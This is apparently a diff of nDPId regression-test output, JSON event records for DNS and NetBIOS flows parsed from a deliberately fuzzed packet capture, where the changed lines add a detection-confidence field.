 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":1120470849636,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470849636,"pkt":"ADBUADRWAODtAW69CABFAABIa70AAIARS5TAqAECwKgBAQr0ADUANOq3JXMAAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJj6XR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848643,"flow_last_seen":1120470849636,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848643,"flow_last_seen":1120470849636,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":3,"flow_last_seen":1120470851639,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CABFAABIa74AAIARS5PAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":554,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470853642,"pkt":"ADBUADRWAODtAW69CFhFAABIa78AAIARS5LAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAET3VkcANzaXAJY3liZXJjaXR5AuRrAFchAAE="}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":554,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2136}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":555,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470857648,"pkt":"ADBUADRWAODtAW69CABFAABJa8QAAIARS43AqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":555,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1120469540839,"flow_last_seen":1120470830228,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2992,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00658{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1120469540839,"flow_last_seen":1120470830228,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2992,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00588{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1120470865650,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470865650,"pkt":"ADBUADRWAODtAW69CABFAABEa8UAAIARS5DAqAECwKgBAQr1ADMAMFWvzyVzAAABAAAAAAAAATEBMAEwAzEyNwdpbj1hZGRyBGFmcGEAAAwAAQ=="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470865651,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1120470865651,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470865651,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvUARzgrzxqAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsbmNhbGhvc3QA"}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470865651,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470865651,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865712,"flow_last_seen":1120470865712,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470865712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1120470865712,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470865712,"pkt":"ADBUADRWAODtAW69CABFAABIa8cAAIARS4rAqAECwKgBAQr2ADUANKezghsBAAABAAAAAAAABF9zaU0EX3VkcANzaXAJY3tiZXJbaXRNAmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865712,"flow_last_seen":1120470865712,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470865712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sim._udp.sip.c_ber_itm.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865712,"flow_last_seen":1120470865712,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470865712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sim._udp.sip.c_ber_itm.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":2,"flow_last_seen":1120470866711,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470866711,"pkt":"ADBUADRWAODtAW69CABFAABIa8gAAIARS4jAqAECwKgBAQr2ADUANKezghsBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJYzRiZXJjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":561,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470865712,"flow_last_seen":1120470866711,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470866711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.c4bercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":561,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470865712,"flow_last_seen":1120470866711,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470866711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.c4bercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":3,"flow_last_seen":1120470868714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470868714,"pkt":"ADB0ADRWAODtAW69CABFAABIa8kAAIARS4jAqAECwKgBAQr2ADUANKezghsBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":562,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470865712,"flow_last_seen":1120470868714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470868714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
